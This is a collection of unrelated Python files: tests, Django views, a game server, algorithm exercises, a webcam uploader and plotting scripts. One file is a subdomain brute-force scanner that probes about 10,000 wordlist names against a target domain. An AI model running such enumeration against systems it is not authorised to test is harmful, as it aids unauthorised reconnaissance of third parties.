    self.assertEqual(message.topic, '/test/mqttools/foo')
    self.assertEqual(message.message, b'sets-alias-in-client')
    # Second delivered message: alias-only PUBLISH, topic resolved locally.
    message = self.run_until_complete(client.messages.get())
    self.assertEqual(message.topic, '/test/mqttools/foo')
    self.assertEqual(message.message, b'published-with-alias')
    self.run_until_complete(client.stop())
def test_resume_session(self):
    """Resuming a session fails on the first connect and succeeds on the second.

    The first CONNACK has session-present = 0, so start(resume_session=True)
    raises SessionResumeError; the second CONNACK has session-present = 1.
    """
    Broker.EXPECTED_DATA_STREAM = [
        # CONNECT with clean session 0 (to resume) and session
        # expiry interval 120.
        (
            'c2s',
            b'\x10\x15\x00\x04MQTT\x05\x00\x00\x00\x05\x11\x00\x00\x00\x78'
            b'\x00\x03bar'
        ),
        # CONNACK with no session present
        ('s2c', b'\x20\x03\x00\x00\x00'),
        # DISCONNECT
        ('c2s', b'\xe0\x02\x00\x00'),
        # CONNECT with clean session 0 (to resume) and session
        # expiry interval 120.
        (
            'c2s',
            b'\x10\x15\x00\x04MQTT\x05\x00\x00\x00\x05\x11\x00\x00\x00\x78'
            b'\x00\x03bar'
        ),
        # CONNACK with session present
        ('s2c', b'\x20\x03\x01\x00\x00'),
        # DISCONNECT
        ('c2s', b'\xe0\x02\x00\x00')
    ]
    client = mqttools.Client(*self.broker.address,
                             'bar',
                             session_expiry_interval=120,
                             topic_alias_maximum=0,
                             connect_delays=[],
                             keep_alive_s=0)
    with self.assertRaises(mqttools.SessionResumeError):
        self.run_until_complete(client.start(resume_session=True))
    self.run_until_complete(client.stop())
    # Ensure the fake broker saw the disconnect before reconnecting.
    self.broker.wait_for_client_closed()
    self.run_until_complete(client.start(resume_session=True))
    self.run_until_complete(client.stop())
logging.basicConfig(level=logging.DEBUG)
if __name__ == '__main__':
unittest.main()
|
22,034 | 1c5270ad50acc3e6fa0af2a384bae3ddfed017d5 | from django.test import TestCase
from django.core.urlresolvers import reverse
from django.urls import resolve
from django.contrib.auth.models import User
from datetime import datetime
from account.models import Profile
from account.forms import SignUpForm
from account.views import signup
class ProfileTests(TestCase):
    """Checks that a Profile attached to a User persists its fields."""

    def setUp(self):
        """Setup a user with inserted profile components"""
        # NOTE(review): relies on a signal creating `user.profile`
        # automatically on User creation -- confirm in account.models.
        self.u1 = User.objects.create(username='Gabby')
        self.u1.profile.bio = "I'm a female profile with inserted components"
        self.u1.profile.birth_date = datetime.now()
        self.u1.profile.gender = 'female'
        self.u1.profile.save()

    def test_components_profile(self):
        """Test the inserted components profile"""
        profile = Profile.objects.get(bio="I'm a female profile with inserted components")
        self.assertEqual(self.u1.profile, profile)

    def test_components_profile_gender(self):
        """Test the inserted components profile's gender"""
        self.assertEqual(self.u1.profile.gender, 'female')
class SignUpTests(TestCase):
    """GET /signup/: status, view resolution, and rendered form inputs."""

    def setUp(self):
        url = reverse('signup')
        self.response = self.client.get(url)

    def test_signup_status_code(self):
        """Test if /signup/ returns status 200"""
        self.assertEquals(self.response.status_code, 200)

    def test_signup_url_resolves_signup_view(self):
        """Test if /signup/ returns the signup view"""
        view = resolve('/signup/')
        self.assertEquals(view.func, signup)

    def test_form_inputs(self):
        """Test if the view contains five inputs: csrf, username, email, pass1 and 2"""
        self.assertContains(self.response, '<input', 5)
        self.assertContains(self.response, 'type="text"', 1)
        self.assertContains(self.response, 'type="email"', 1)
        self.assertContains(self.response, 'type="password"', 2)
class SignUpFormTests(TestCase):
    """Guards the SignUpForm field list against accidental changes."""

    def test_form_has_fields(self):
        """Test if SignUpForm still has the proper fields"""
        form = SignUpForm()
        expected = ['username', 'email', 'password1', 'password2']
        actual = list(form.fields)
        self.assertSequenceEqual(expected, actual)
class SuccessfulSignUpTests(TestCase):
    """POSTs a valid signup payload; assertions presumably live past this chunk."""

    def setUp(self):
        url = reverse('signup')
        data = {
            'username': 'Gab',
            'email': 'gab@gmail.com',
            'password1': 'test',
            'password2': 'test',
        }
        self.response = self.client.post(url, data)
        self.home_url = reverse('index')
|
22,035 | bbcd8f12f3292b995c03c5efc26c36f515e75f55 | import time
import requests
def main():
    """Print the average morning temperature and the highest daily maximum
    for the next five days from the OpenWeatherMap One Call API.

    Fixes:
    - the average previously divided by a hard-coded 5 even though the API
      may return a different number of entries inside the 5-day window;
    - ``max()`` on an empty list raised ValueError, silently swallowed by
      the broad except below.
    """
    city_lat = 44.89
    city_lon = 37.31
    app_id = 'your app_id'
    # Upper bound of the window: now + 5 days (432000 seconds).
    time_delta = int(time.time()) + 432000
    morn = 0
    max_temp = list()
    try:
        res = requests.get("https://api.openweathermap.org/data/2.5/onecall",
                           params={'lat': city_lat, 'lon': city_lon, 'units': 'metric',
                                   'lang': 'ru', 'exclude': 'minutely,hourly,alerts',
                                   'APPID': app_id})
        data = res.json()
        for i in data['daily']:
            if time_delta >= i['dt']:
                morn += i['temp']['morn']
                max_temp.append(i['temp']['max'])
        if max_temp:
            # Divide by the actual number of matched days, not a constant.
            print(f'average_morn: {morn/len(max_temp)}')
            # NOTE(review): label says "average" but this is the maximum of
            # the daily maxima, as in the original -- confirm intent.
            print(f'average_max: {max(max_temp)}')
    except Exception as e:
        print("Exception (forecast):", e)
|
22,036 | d440a882f87f12ab6036fefb19e0184cbc9fcd42 | import asyncio
import json
import enum
import functools
from protocol import Header, Error
from . import request_schemas, response_schemas
from .creature import Creature
from .player import Player
from engine import Engine, API
from marshmallow import ValidationError
# debug
from marshmallow import pprint
class Game(object):
    """Bridges the wire protocol and the game engine.

    Keeps a per-connection session dict (keyed by socket address) and
    dispatches parsed JSON requests to the handler methods listed in
    `request_handlers`.
    """

    # Seconds to sleep between engine world iterations.
    ENGINE_ITERATE_INTERVAL = 1
    # addr -> session state: "uid", "authorized", "last_commit".
    # NOTE(review): class-level attribute, shared across Game instances.
    sessions = dict()
    engine = None
    api = None
    engine_is_working = False

    def __init__(self):
        self.engine = Engine()
        self.api = API(self.engine)

    async def run(self):
        """Engine main loop; this coroutine must be scheduled for the
        application to actually run. Stops when `engine_is_working` is
        cleared."""
        self.engine_is_working = True
        while self.engine_is_working:
            self.engine.iterate_world()
            await asyncio.sleep(Game.ENGINE_ITERATE_INTERVAL)

    def check_request(request_schema):
        """ Checks if given request is valid. An can be
        serialized using given schema.
        Decorator has to be used only with request-handler functions.
        Validates request, at worst returns error header and messages, otherwise
        pass validated request to decorated function.
        """
        # Defined in the class body without `self` on purpose: it is only
        # used to decorate the handler methods below, at class-creation time.
        def decorator(f):
            @functools.wraps(f)
            def wrapper(self, addr, request):
                # marshmallow 2-style API: load() returns (data, errors).
                data, err = request_schema.load(request)
                if err:
                    return Header.ERROR, Error.WRONG_REQUEST
                else:
                    return f(self, addr, data)
            return wrapper
        return decorator

    def check_authorized(f):
        """Decorator that checks if user authorized.
        Decorator has to be used only with request-handler functions.
        Actually checks if `authorized` key exists and its value equals `True`.
        At worst return corresponding error.
        """
        @functools.wraps(f)
        def wrapper(self, addr, request):
            if not self.sessions[addr].get("authorized"):
                return Header.ERROR, Error.FORBIDDEN_REQUEST
            else:
                return f(self, addr, request)
        return wrapper

    @check_request(request_schemas.AuthRequestSchema())
    def auth_handler(self, addr, request):
        # Mark the session authorized and remember the client-supplied uid;
        # the commit cursor starts at 0 so the first update sends everything.
        self.sessions[addr]["uid"] = request["uid"]
        self.sessions[addr]["authorized"] = True
        self.sessions[addr]["last_commit"] = 0
        return Header.RESPONSE, "Authorized!"

    @check_request(request_schemas.EchoRequestSchema())
    @check_authorized
    def echo_handler(self, addr, request):
        # Echo the payload back, prefixed with the sender's uid.
        echo = f"<{self.sessions[addr]['uid']}>: {request['data']}>"
        return Header.RESPONSE, echo

    @check_authorized
    def init_player_handler(self, addr, request):
        # Create an engine-side player bound to this connection's address.
        player = Player(addr)
        self.api.add_player(addr, player)
        return Header.RESPONSE, "Player created."

    @check_request(request_schemas.MoveRequestSchema())
    @check_authorized
    def move_handler(self, addr, request):
        player_id = self.api.get_player_id(addr)
        self.api.move_object(player_id, request["x"], request["y"])
        return Header.RESPONSE, "Moved."

    @check_authorized
    def get_world_handler(self, addr, request):
        # Full world dump; fast-forwards the session's commit cursor so a
        # following "update" only sends newer commits.
        world = self.api.get_world_dump()
        response = dict(world=world)
        response, err = response_schemas.GetWorldSchema().dump(response)
        self.sessions[addr]["last_commit"] = self.api.get_last_commit_id()
        return Header.RESPONSE, json.dumps(response)

    @check_authorized
    def update_handler(self, addr, request):
        """HACK (original author's note): serializes Commit objects inline
        with a local import instead of going through response_schemas --
        should be refactored."""
        commits = self.api.get_commits(start_from=self.sessions[addr]["last_commit"])
        from engine.commit_container.commit import Commit
        t, e = Commit.Schema(many=True).dump(commits["commits"])
        response = {
            "type" : "update",
            "commit_range" : {
                "commits" : t
            }
        }
        self.sessions[addr]["last_commit"] = self.api.get_last_commit_id()
        return Header.RESPONSE, json.dumps(response)

    # Maps the "request" field of incoming JSON to the handler method.
    request_handlers = {
        "auth" : auth_handler,
        "echo" : echo_handler,
        "init_player" : init_player_handler,
        "get_world" : get_world_handler,
        "update" : update_handler,
        "move" : move_handler
    }

    def connection_handler(self, addr):
        # New connection starts with an empty (unauthorized) session.
        print(f"<{addr}> Connected to the server")
        self.sessions[addr] = {}

    def disconnection_handler(self, addr):
        print(f"<{addr}> Disconnected from the server")
        del self.sessions[addr]

    def process_exnternal_request(self, addr, data_type, data_size=0, data=bytes()):
        """Handles external request and returns result.
        :param addr: Unique network address of client (socket-address)
        :param data_type: Header with which request was sent
        :return: Returns protocol header and data of the response
        """
        if data_type == Header.REQUEST:
            try:
                request = json.loads(data)
            except json.decoder.JSONDecodeError:
                return Header.ERROR, Error.SERIALIZE_ERROR
            # Validate only the envelope here; handlers validate their own body.
            data, err = request_schemas.BaseRequestSchema().load(request)
            if err or not data["request"] in self.request_handlers:
                return Header.ERROR, Error.WRONG_REQUEST
            handler = self.request_handlers[data["request"]]
            # Handlers are stored as plain functions, hence the explicit self.
            return handler(self, addr, request)
        else:
            return Header.ERROR, Error.WRONG_REQUEST
|
22,037 | 1961e7b9e35080c191559e8971e6ec29212086c1 | import numpy as np
# Read nine whitespace-separated integers from stdin and print them
# as a 3x3 integer matrix.
values = np.array(input().split(), dtype=int)
print(values.reshape(3, 3))
|
22,038 | a5d5f37b29c7df7b69535ff4398a06f63285adf4 | import requests
import sys
from optparse import OptionParser
def scanDomains(domain, port):
    """Brute-force subdomains of *domain* on *port* using a wordlist.

    For every word W in Wordlists/subdomains-10000.txt, requests
    http://W.<domain>:<port> and prints the URL if the host answers.

    Fix: the wordlist handle was opened and never closed; use a context
    manager so it is released deterministically.
    """
    with open("Wordlists/subdomains-10000.txt") as wordlist:
        subs = wordlist.read().splitlines()
    for word in subs:
        url = f"http://{word}.{domain}:{port}"
        try:
            requests.get(url)
        except requests.ConnectionError:
            # Host does not resolve / refuses -- not a subdomain, move on.
            pass
        else:
            print("[+] Discovered subdomain:: ", url)
if __name__ == '__main__':
    # Set up options from the commandline
    usage = "usage: %prog [options] filename"
    parser = OptionParser(usage=usage)
    parser.add_option("-p", "--port", dest="port", help="set target port to PORT", metavar="PORT", default="80")
    # NOTE(review): the 'secure' and 'https' options are parsed but never
    # passed to scanDomains, which always uses plain http -- confirm intent.
    parser.add_option("-s", "--secure", dest="secure", help="Forces request to use SSL", default=False, action="store_true")
    parser.add_option(("-a"), "--https", dest="https", help="Scans using https", default=False)
    parser.add_option("-t", "--target", dest="target", help="set target domain in format domain.top_level_domain", metavar="HOST")
    (options, args) = parser.parse_args()
    scanDomains(options.target, options.port)
|
22,039 | 50ecab58869447d94d44b1c053248d88265a7ade | from pyDatalog import pyDatalog
pyDatalog.create_terms('X, Y, Z, H, doctor, spec, simpt, patient, depart, dep_simpt, pat_doc, pat_dep')
# Fix: the string below was unterminated (missing closing quote), which made
# the entire script fail to parse with a SyntaxError.
pyDatalog.create_terms('K, L, nurse, helps_the_doctor')
# Facts: each doctor's speciality.
+(doctor['Dr. Alex'] == 'Lor')
+(doctor['Dr. Mary'] == 'Oculist')
+(doctor['Dr. Mitch'] == 'Therapist')
+(doctor['Dr. Marty'] == 'Orthopedist')
+(doctor['Dr. Kenny'] == 'Cardiologist')
# Facts: which nurse assists which doctor.
# NOTE(review): the same fact is asserted four times below; pyDatalog facts
# are set-like, so the duplicates are harmless but probably unintended.
+(nurse ['Mary']=='Dr. Alex')
+(nurse ['John']=='Dr. Mary')
+(nurse ['Mary']=='Dr. Alex')
+(nurse ['Mary']=='Dr. Alex')
+(nurse ['Mary']=='Dr. Alex')
# Facts: which speciality treats which body part / symptom.
+(spec['Nose'] == 'Lor')
+(spec['Ears'] == 'Lor')
+(spec['Throat'] =='Lor')
+(spec['Eye'] == 'Oculist')
+(spec['Stomach'] == 'Therapist')
+(spec['Liver'] == 'Therapist')
+(spec['Foot'] == 'Orthopedist')
+(spec['Back'] == 'Orthopedist')
+(spec['Heart'] == 'Cardiologist')
# Facts: which department each doctor works in.
+(depart['Dr. Alex'] == '1')
+(depart['Dr. Mary'] == '1')
+(depart['Dr. Mitch'] == '2')
+(depart['Dr. Marty'] =='2')
+(depart['Dr. Kenny'] == '3')
# Rule: symptom -> doctor (via the treating speciality).
(simpt[X] == Y) <= (spec[X] == Z) & (doctor[Y] == Z)
#print(simpt[X] == Y)
# Rule: symptom -> department (via the doctor who treats it).
(dep_simpt[X] == Y) <= (simpt[X] == Z) & (depart[Z] == Y)
#print(dep_simpt[X] == Y)
# Facts: each patient's complaint.
+(patient['Dalas'] == 'Nose')
+(patient['Erik'] == 'Foot')
+(patient['Bill'] == 'Back')
+(patient['Ana'] == 'Heart')
+(patient['Sony'] == 'Eye')
+(patient['Saly'] == 'Ears')
# Rule + query: patient -> doctor.  (Output text is Russian by design.)
(pat_doc[X] == Y) <= (patient[X] == Z) & (simpt[Z] == Y)
print('Вывод врача для пациента:\n')
print(pat_doc[X] == Y)
# Rule + query: patient -> department number.
(pat_dep[X] == Y) <= (patient[X] == Z) & (dep_simpt[Z] == Y)
print('\nВывод номера отделения для пациента:\n')
print(pat_dep[X] == Y)
22,040 | a2077869a3403629a86d0bd29d8f1cb3bccfdfc8 | import collections
class Solution:
    """LeetCode 1002: characters (with multiplicity) common to every word."""

    def commonChars(self, A: [str]) -> [str]:
        """Intersect per-word character counts, then expand the survivors."""
        if not A:
            return []
        # Counts for the first word seed the running intersection.
        common = self.get_char_count(A[0])
        for word in A[1:]:
            counts = self.get_char_count(word)
            for ch in common:
                common[ch] = min(common[ch], counts[ch]) if ch in counts else 0
        # Repeat each surviving character by its final count.
        return [ch for ch in common for _ in range(common[ch])]

    def get_char_count(self, word: str):
        """Return a character -> occurrence-count mapping for *word*."""
        frequencies = collections.defaultdict(int)
        for ch in word:
            frequencies[ch] += 1
        return frequencies

    # Same logic expressed with Counter's multiset intersection (&).
    def commonChars_1(self, A: [str]) -> [str]:
        if not A:
            return []
        common = collections.Counter(A[0])
        for word in A[1:]:
            common &= collections.Counter(word)
        # elements() repeats each key count-times, in first-seen order.
        return list(common.elements())
# Ad-hoc demo run.
sol = Solution()
A = ["bella","label","roller"]
# NOTE(review): the assignment above is immediately overwritten below,
# so only the second sample is actually exercised.
A = ["cool","lock","cook"]
print(sol.commonChars_1(A))
|
22,041 | ce22423892a403b8e724b95e00716595c8bac9a4 | from tkinter import *
import time
def button_clicked():
    """Refresh the button label with the current time on each click."""
    # Update the button's text (reads the module-level `button` widget).
    button['text'] = time.strftime('%H:%M:%S')
root=Tk()
# Create the widget.
button = Button(root)
# Configure the widget after creation.
button.configure(text=time.strftime('%H:%M:%S'), command=button_clicked)
# Square-bracket item access works as well:
# button['text'] = time.strftime('%H:%M:%S')
# button['command'] = button_clicked
button.pack()
root.mainloop()
|
22,042 | 35b859d37d2c7071677338767571b5bd716e31cc | # -*- coding: utf-8 -*-
# original: https://raw.githubusercontent.com/UedaTakeyuki/slider/master/mh_z19.py
#
# © Takeyuki UEDA 2015 -
import os
import subprocess
import ConfigParser
import datetime
import requests
import urllib3
import shutil
from error_counter import Counter
from urllib3.exceptions import InsecureRequestWarning
# refer http://73spica.tech/blog/requests-insecurerequestwarning-disable/
urllib3.disable_warnings(InsecureRequestWarning)
# Const
configfile = os.path.dirname(os.path.abspath(__file__))+'/uvc_photo.ini'
# setting
settings = {
"folder": "/tmp/",
"device": "/dev/video0",
"delay": "1",
"skip": "20",
"width": "320",
"hight": "240",
"er_on": False,
"read_error_counter": "",
"send_error_counter": ""
}
# https://code.i-harness.com/en/q/aea99
# https://code.i-harness.com/en/q/aea99
def str2bool(v):
    """Interpret 'yes'/'true'/'t'/'1' (any case) as True, anything else as False."""
    return v.lower() in {"yes", "true", "t", "1"}
# termination type
TERMINATOR_DELETEVALUE_AS_FILE=True
def setconfig(ini):
    """Merge values from the parsed .ini into the module-level `settings`.

    Only keys that are present AND non-empty in the file override the
    defaults.  Error-recovery counters are only created when recover_on
    is truthy.

    Fix: the send/save counter checks used the key "readcounterfile" by
    copy-paste, so "sendcounterfile" configured without "readcounterfile"
    was silently ignored.
    """
    global settings
    if "photo" in ini.sections():
        if "folder" in dict(ini.items("photo")).keys() and ini.get("photo","folder"):
            settings["folder"] = ini.get("photo","folder")
            # Normalize to a trailing slash and make sure the folder exists.
            if settings["folder"][-1:] != "/":
                settings["folder"] += "/"
            if not os.path.exists(settings["folder"]):
                os.makedirs(settings["folder"]) # keyword "exist_ok" is for 3
        if "device" in dict(ini.items("photo")).keys() and ini.get("photo","device"):
            settings["device"] = ini.get("photo","device")
        if "delay" in dict(ini.items("photo")).keys() and ini.get("photo","delay"):
            settings["delay"] = ini.get("photo","delay")
        if "skip" in dict(ini.items("photo")).keys() and ini.get("photo","skip"):
            settings["skip"] = ini.get("photo","skip")
        if "width" in dict(ini.items("photo")).keys() and ini.get("photo","width"):
            settings["width"] = ini.get("photo","width")
        if "hight" in dict(ini.items("photo")).keys() and ini.get("photo","hight"):
            settings["hight"] = ini.get("photo","hight")
    if "error_recovery" in ini.sections():
        if "recover_on" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","recover_on"):
            settings["er_on"] = str2bool(ini.get("error_recovery", "recover_on")) # error_recovery
        # error_counter
        if settings["er_on"]:
            if "readcounterfile" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","readcounterfile"):
                settings["read_error_counter"] = Counter(ini.get("error_recovery", "readcounterfile"))
            # Fixed key: previously tested "readcounterfile" here.
            if "sendcounterfile" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","sendcounterfile"):
                settings["send_error_counter"] = Counter(ini.get("error_recovery", "sendcounterfile"))
            if "savecounterfile" in dict(ini.items("error_recovery")).keys() and ini.get("error_recovery","savecounterfile"):
                settings["save_error_counter"] = Counter(ini.get("error_recovery", "savecounterfile"))
# Apply .ini overrides at import time, if the config file exists.
# NOTE(review): `ini` is only bound inside this branch, yet handle()/save()
# below read it unconditionally -- they will raise NameError when the
# config file is absent; confirm deployment always ships uvc_photo.ini.
if os.path.exists(configfile):
    ini = ConfigParser.SafeConfigParser()
    ini.read(configfile)
    setconfig(ini)
def take_photo():
    """Capture one webcam frame via fswebcam and return the saved file path.

    The file is named from the current timestamp inside settings["folder"].
    When error recovery is enabled, the read-error counter is incremented
    on a missing output file and reset on success.
    """
    global settings
    now = datetime.datetime.now()
    filepath = "{}{}.jpg".format(settings["folder"],now.strftime("%Y%m%d%H%M%S"))
    if os.path.exists(filepath): # remove if old version exist
        os.remove(filepath)
    command_str = "fswebcam --no-timestamp --title \"©Atelier UEDA\" {} -d {} -D {} -S {} -r {}x{}".format(filepath,
                   settings["device"],
                   settings["delay"],
                   settings["skip"],
                   settings["width"],
                   settings["hight"])
    p = subprocess.Popen(command_str, stderr = subprocess.PIPE, shell=True)
    p.wait() # wait for finish.
    # fswebcam reports success by producing the file; absence = camera I/O error.
    if not os.path.exists(filepath): # Camera IO erro
        # raise IOError(''.join(p.stderr.readlines()))
        if settings["er_on"]:
            settings["read_error_counter"].inc_error()
    else:
        if settings["er_on"]:
            settings["read_error_counter"].reset_error()
    # Returned even on failure; callers check existence themselves.
    return filepath
def read():
    """Capture one photo and return it keyed for the sensor framework."""
    return dict(photo=take_photo())
def is_photo_source(sensor_handlers):
    """Return True when *sensor_handlers* exposes the file-deletion
    terminator flag, i.e. its values are photo files to delete after use."""
    attributes = dir(sensor_handlers)
    return 'TERMINATOR_DELETEVALUE_AS_FILE' in attributes
def handle(sensor_handlers, data_name, value):
    """Upload the captured photo to the configured server and archive it.

    *value* is the local photo path.  Uses the module-level `ini` for the
    server URL and view id.  Python 2 code (bare print statement below).
    """
    print ("start handle")
    if is_photo_source(sensor_handlers):
        files = {'upfile': open(value, 'rb')}
        payload = {'viewid': ini.get("server", "view_id")}
        r = None
        try:
            # verify=False: server uses a self-signed cert (warnings are
            # disabled at the top of this module).
            r = requests.post(ini.get("server", "url"), data=payload, files=files, timeout=10, verify=False)
        except:
            if settings["er_on"]:
                settings["send_error_counter"].inc_error()
        if not r is None:
            if settings["er_on"]:
                settings["send_error_counter"].reset_error()
            print r.text
        # Archive a local copy regardless of upload outcome.
        save(ini.get("server", "view_id"), value)
    print ("end handle")
def save(viewid, picfilepath):
    """Copy the captured photo into the per-view archive folder.

    Best-effort: any failure only bumps the save-error counter (when error
    recovery is enabled).

    Fix: reset_error() previously ran unconditionally after the except
    branch, immediately cancelling the inc_error() just recorded; it now
    only runs on success (try/else).
    """
    try:
        # make saving folder
        base_of_saving_folder = ini.get("save", "data_path")
        saving_folder = base_of_saving_folder + "/" + viewid
        if not os.path.exists(saving_folder):
            os.makedirs(saving_folder)
        shutil.copyfile(picfilepath, saving_folder + "/" + os.path.basename(picfilepath))
    except:
        # Deliberately broad: archiving must never crash the capture loop.
        if settings["er_on"]:
            settings["save_error_counter"].inc_error()
    else:
        if settings["er_on"]:
            settings["save_error_counter"].reset_error()
def terminate(sensor_handlers, data_name, value):
    """Clean-up hook: delete the local photo file once it has been handled."""
    print ("start terminate")
    if is_photo_source(sensor_handlers):
        os.remove(value)
    print ("end terminate")
if __name__ == '__main__':
    # Manual smoke test: capture one photo and print the returned mapping.
    value = read()
    print (value)
|
22,043 | 3c3ec6f98c032d8097a47a57536c6a7bc58d8ac6 | '''
Created on 26. sep. 2012
@author: Habitats
'''
from heapq import heappop, heappush
from fileinput import input
#import time
def prim(graph):
    """Grow a minimum spanning tree with Prim's algorithm and return the
    weight of its heaviest edge.

    *graph* is an adjacency list: graph[node] is a {neighbour: weight} dict.
    """
    tree = {}                      # node -> parent in the spanning tree
    frontier = [(0, None, 0)]      # heap of (edge weight, parent, node)
    heaviest = 0
    while frontier:
        weight, parent, node = heappop(frontier)
        if node in tree:
            continue               # already connected via a lighter edge
        tree[node] = parent
        heaviest = max(heaviest, weight)
        for neighbour, edge_weight in graph[node].items():
            heappush(frontier, (edge_weight, node, neighbour))
    return heaviest
def genInput():
    """Read an adjacency list via fileinput (stdin or argv file names).

    Each line describes one node as whitespace-separated "to:weight"
    tokens; returns a list, indexed by node id, of {neighbour: weight}
    dicts.
    """
    graph = []
    node = 0  # NOTE(review): rebound immediately in the loop; effectively unused
    for line in input():
        args = line.split()
        node = {}
        for arg in args:
            to, weight = arg.split(":")
            to = int(to)
            weight = int(weight)
            node[to] = weight
        graph.append(node)
    return graph
# Timing scaffolding kept for reference; this is Python 2 code
# (bare print statement below).
#start = time.clock()
#graph = genInput()
#print (time.clock() - start) * 1000
#
#start = time.clock()
#print prim(graph, 0)
#print (time.clock() - start) * 1000
#start = time.clock()
# Entry point: read the graph and print the MST's heaviest edge weight.
print prim(genInput())
|
22,044 | 88875255da267f609d19eb9b7e03c4dcb559978f | #!/usr/bin/env python
# coding: utf-8
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
# Directories with one CSV per experiment run for each approach.
url_lu = "/home/jgines/waf2020_data/data/exp2/lu/"
url_proposal = "/home/jgines/waf2020_data/data/exp2/proposal/"
# Run count is taken from the "lu" directory.
# NOTE(review): assumes both directories hold the same number of files,
# named 1.csv .. N.csv -- confirm.
n = len(os.listdir(url_lu)) + 1
numberofcsvs = range(1,n)
extension = ".csv"
#df = pd.DataFrame(columns=["distance","robot_cost"])
#for i in numberofcsvs:
#    url_num = url + str(i) + extension
#    df_ = pd.read_csv(url_num, keep_default_na = False)
#    df = pd.concat([df, df_])
#df_cost = pd.DataFrame()
#for i in numberofcsvs:
#    url_num = url + str(i) + extension
#    df_ = pd.read_csv(url_num, keep_default_na = False)
#    df_cost = pd.concat([df_cost, df_["robot_cost"]], axis=1)
# Collect the per-run "distance" column for each approach, one column per run.
df_dist_lu = pd.DataFrame()
for i in numberofcsvs:
    url_num = url_lu + str(i) + extension
    df_ = pd.read_csv(url_num, keep_default_na = False)
    df_dist_lu = pd.concat([df_dist_lu, df_["distance"]], axis=1)
df_dist_proposal = pd.DataFrame()
for i in numberofcsvs:
    url_num = url_proposal + str(i) + extension
    df_ = pd.read_csv(url_num, keep_default_na = False)
    df_dist_proposal = pd.concat([df_dist_proposal, df_["distance"]], axis=1)
df_dist_lu.head(100)
df_dist_proposal.head(100)
#df_cost.head(100)
#mean_cost = df_cost.mean(axis=1)
# Average across runs at each timestep.
mean_distance_lu = df_dist_lu.mean(axis=1)
mean_distance_proposal = df_dist_proposal.mean(axis=1)
plt.plot(mean_distance_lu.values) # mean distance between robot and human
plt.plot(mean_distance_proposal.values)
plt.xlabel('Time (s)')
plt.ylabel('Distance (m)')
plt.yticks(np.arange(min(mean_distance_proposal.values),
           max(mean_distance_lu.values) + 0.2, 0.2))
#plt.title('Distance to human during the Escort task.')
plt.savefig("/home/jgines/waf2020_data/figures/distance.pdf")
plt.clf()
# NOTE(review): `df_` here is whatever CSV was loaded last in the loops
# above, so this counts rows of a single run, not runs -- confirm intent.
print("Experiments: " + str(len(df_['distance'])))
#plt.plot(mean_cost.values)
#plt.xlabel('Time (s)')
#plt.ylabel('Distance (miles)')
#plt.title('Distance traveled')
#plt.savefig("/home/jgines/waf2020_data/figures/cost.pdf")
#plt.clf()
#print ("-------------- Extracted data ------------")
#print("Experiments: " + str(len(df['time'])))
#print("Time (tau): " + str(df['time'].mean()) + "(" + str(df['time'].std()) + ")")
#print("Distance (dt): " + str(df['distance'].mean()) + "(" + str(df['distance'].std()) + ")")
#print("dmin: " + str(df['dmin'].min()))
#print("dmin: " + str(df['dmin'].mean()) + "(" + str(df['dmin'].std()) + ")")
#print("psi_personal: " + str(df['psi_personal'].mean()) + "(" + str(df['psi_personal'].std()) + ")")
#print("psi_intimate: " + str(df['psi_intimate'].mean()) + "(" + str(df['psi_intimate'].std()) + ")") |
22,045 | c219d296ef8fb37ad46d6112ca66c0ae831ccde6 | import random
from django.conf import settings
from django.http import HttpResponse, Http404, JsonResponse
from django.shortcuts import render, redirect
from django.utils.http import is_safe_url
from .forms import PostFrom
from .models import Post
ALLOWED_HOSTS = settings.ALLOWED_HOSTS
# Create your views here.
def home_page(request, *args, **kwargs):
    """Render the static landing page."""
    return render(request, "pages/main.html", context={}, status=200)
def post_create_view(request, *arg, **kwargs):
    """Create a Post from form data; answers AJAX with JSON, otherwise
    redirects to a validated `next` URL or re-renders the empty form."""
    form = PostFrom(request.POST or None)
    next_url = request.POST.get("next") or None
    if form.is_valid():
        obj = form.save(commit=False)
        obj.save()
        # Saving to DF
        # NOTE(review): request.is_ajax() is deprecated in Django 3.1+ --
        # confirm the project's Django version.
        if request.is_ajax():
            return JsonResponse({}, status=201)  # 201 for created items || wanna replace {} with serialize from models.py, but got error 500
        # Only follow `next` if it points at one of our own hosts.
        if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):
            return redirect(next_url)
        form = PostFrom()
    return render(request, 'components/form.html', context={"form": form})
def post_list_view(request, *args, **kwargs):
    """
    REST API View
    Consumed by JavaScript
    return json data
    """
    qs = Post.objects.all()
    # NOTE(review): likes/reposts are random placeholders, not stored data.
    posts_list = [{"id": x.id, "content": x.content, "likes": random.randint(0, 120), "reposts": random.randint(0, 10)} for x in qs] #{"id": x.id, "content": x.content, "likes": random.randint(0, 120), "reposts": random.randint(0, 10) }/x.serialize()
    data = {
        "isUser": False,
        "response": posts_list
    }
    return JsonResponse(data) #, save=False
def post_detail_id(request, post_id, *args, **kwargs):
    """
    REST API View
    Consumed by JavaScript
    Return one post as JSON, or a 404 payload when the id is unknown.

    Fix: the bare ``except:`` previously swallowed every exception
    (including programming errors) and reported them all as "not found";
    only the expected Post.DoesNotExist is handled now.
    """
    data = {
        "id": post_id,
    }
    status = 200
    try:
        obj = Post.objects.get(id=post_id)
    except Post.DoesNotExist:
        data['message'] = "not found"
        status = 404
    else:
        data['content'] = obj.content
    return JsonResponse(data, status=status)  # json.dumps content_type='application/json'
# Looking for a mentor in JS & Python, because sometimes I need a fresh look at my code!
22,046 | fc60a8fe4f305510eaf83fffb0b9361f3e2eb8d2 | # Generated by Django 3.0.3 on 2020-05-25 08:44
import ToDo.models
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: makes Attachments.content a required
    FileField with an upload path computed by get_attachment_dir."""

    dependencies = [
        ('ToDo', '0021_auto_20200525_0019'),
    ]

    operations = [
        migrations.AlterField(
            model_name='attachments',
            name='content',
            field=models.FileField(default=None, help_text='Add important documents or pictures', upload_to=ToDo.models.get_attachment_dir),
            # default=None was only needed to apply the schema change;
            # it is not kept on the model.
            preserve_default=False,
        ),
    ]
|
22,047 | 568c63a5d8e025f71e4681c1354338c88564ee18 | # -*- coding: utf-8 -*-
"""
Created on Fri Jun 4 10:50:08 2021
@author: hp
"""
from flask_restful import Resource, request
from Models.User import UserModel
class UserResource(Resource):
    """REST resource over UserModel: list users (GET) and create one (POST)."""

    '''
    def get(self, email):
